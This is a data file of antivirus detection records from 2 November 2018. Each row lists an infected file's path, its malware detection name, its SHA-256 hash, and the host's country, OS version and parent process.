  Row(detection=Row(filename='sprites.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\COMMON\\SPRITES\\SPRITES.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='69e07e9b100f8911a6f00d6613bc216a9c3813488e701f98a0e0818665be2278', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:09:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='32[1].zip', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\WNMX7T5I\\32[1].zip', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:09:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tskill.exe', filepath='d:\\windows\\system32\\tskill.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='188c33b25279134945a91f3fc47195f14faf4385d48ae544fcb3890e8eaf2e38', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:38:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:06:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='b1b538ce-9b1e-a095-e78d-a93cdcc3ff42.exe', filepath='F:\\{78911544-95f0-fdef-2e08-6eabacb7eaaa} (2)\\b1b538ce-9b1e-a095-e78d-a93cdcc3ff42.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='1ec36fc1bb6bce36dd3a82304be237919ede3e6b790b7a248c340042353b5bc0', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1716224, timestamp='2018-11-02T02:01:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0eac87397ccf95d2f010a776b7dfdb718fe46b49511251ae348e303310f8915e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0EAC87397CCF95D2F010A776B7DFDB718FE46B49511251AE348E303310F8915E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0eac87397ccf95d2f010a776b7dfdb718fe46b49511251ae348e303310f8915e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:30:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xuetr.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\XueTr.exe", filesize=64000, name='TR/Siggen.64000.12.#M1.#R1'), hash='01bb8e327211e5fff9594e791c0abb322f765b94a3d0400e7eec9dad68e3310e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:17:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wd apps setup.exe', filepath='E:\\My Passport Apps for Mac\\WD Apps Setup.exe', filesize=4224000, name='TR/Patched.Gen.#M300.#R3374'), hash='3727f3a489289c1fcc6a1edb90f2af0c1f512f17825053200ba88f9ceedfefcc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T18:59:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3dcc0f2f4a6c71d24c105c22ea053e1482f419f5aa927888f358eb1c72c564c4', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T04:55:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='decelod_734951e6.exe', filepath='C:\\Users\\X\\AppData\\Local\\{B8788E24-9CD0-E29C-F148-C774D5203BEC}\\decelod_734951e6.exe', filesize=1600000, name='HEUR/AGEN.1033829.#M1.#R1'), hash='1623129501d3a77f371635e57f9f599b6a3d3d202427c7d5a95ca710d9f22f8b', metadata=Row(cmdline='--engine=2 --session-id=\\\\\\/UisE3Y5XkckYeZOUHLc5PKGoB9QRhXHjdgA0f2i --registry-suffix=ESET --extended-safebrowsing-enabled --chrome-version=70.0.3538.77 --chrome-channel=4 --srt-field-trial-group-name=NewCleanerUIExperiment', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.177.200\\software_reporter_tool.exe', parentsize=12084856, timestamp='2018-11-02T03:25:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='G:\\Driver ordenador Pepe\\Acer Aspire 5620 Montañeta\\utilities\\Acer GridVista  2.50.1202\\AcerGrid\\Setup.exe', filesize=512000, name='W32/Sality.Y.#M1.#R1'), hash='0fd106821acb531af2a479227ab7e9e2f18d095df8476b14c89a61efe7dd9fa6', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:44:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-005852-cfb22bfc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d24877d\\AVSCAN-20181103-005613-C00024DA\\AVSCAN-20181103-005852-CFB22BFC', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:06:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-135228-99f48339', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c16aa68d\\AVSCAN-20181102-135203-948BE30E\\AVSCAN-20181102-135228-99F48339', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:52:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000036ed', filepath='C:\\Windows\\Temp\\25248e84-e2bd-4c2b-b714-a7e7fe0e64c0\\tmp000031d1\\tmp000036ed', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='0ff8941a174ace0c00bdd09d6fe8f7be1b34f1cd6a6ae7f8cafaff0451c61465', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.4.942.11595\\AdAwareService.exe', parentsize=542896, timestamp='2018-11-02T10:02:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061042-39642bcb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-061022-36B694EC\\AVSCAN-20181102-061042-39642BCB', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054729-c14dd969', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054729-C14DD969', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055236-78452a90', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055236-78452A90', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mall.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\MALL\\MALL.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-123312-546966ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_16818d22\\AVSCAN-20181102-123252-50E21CEB\\AVSCAN-20181102-123312-546966ED', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:33:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160435-1f5b8d0f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-160435-1F5B8D0F', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:07:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061431-883da450', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061431-883DA450', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104822-59eab365', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-104746-534354B7\\AVSCAN-20181102-104822-59EAB365', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:51:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061940-405bd3e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061940-405BD3E6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050338-a13f2326', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050338-A13F2326', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061450-93b31ebf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061450-93B31EBF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055203-64c7d8d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055203-64C7D8D9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131035-7fe32256', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_75311e2b\\AVSCAN-20181102-130957-7A16ADC4\\AVSCAN-20181102-131035-7FE32256', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:10:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055401-aaf9ff4b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055401-AAF9FF4B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-092739-72d99283', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c5751850\\AVSCAN-20181102-092727-7036BBC4\\AVSCAN-20181102-092739-72D99283', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:27:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061414-7dd132a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061414-7DD132A1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051522-44f5f8ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051522-44F5F8CA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='level12.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL12\\LEVEL12.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='549a129edf8e1b2dcf657cd8495702ce9fee17d4bbd13188a4f5928b5cc34f30', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054220-090651b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054220-090651B5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052211-38687a71', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052211-38687A71', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bridge.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\BRIDGE\\BRIDGE.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061211-34e6e44b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061211-34E6E44B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051028-95b13c90', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051028-95B13C90', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052602-c2859cba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052602-C2859CBA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:01Z'), dt=datetime.date(2018, 11, 2)),
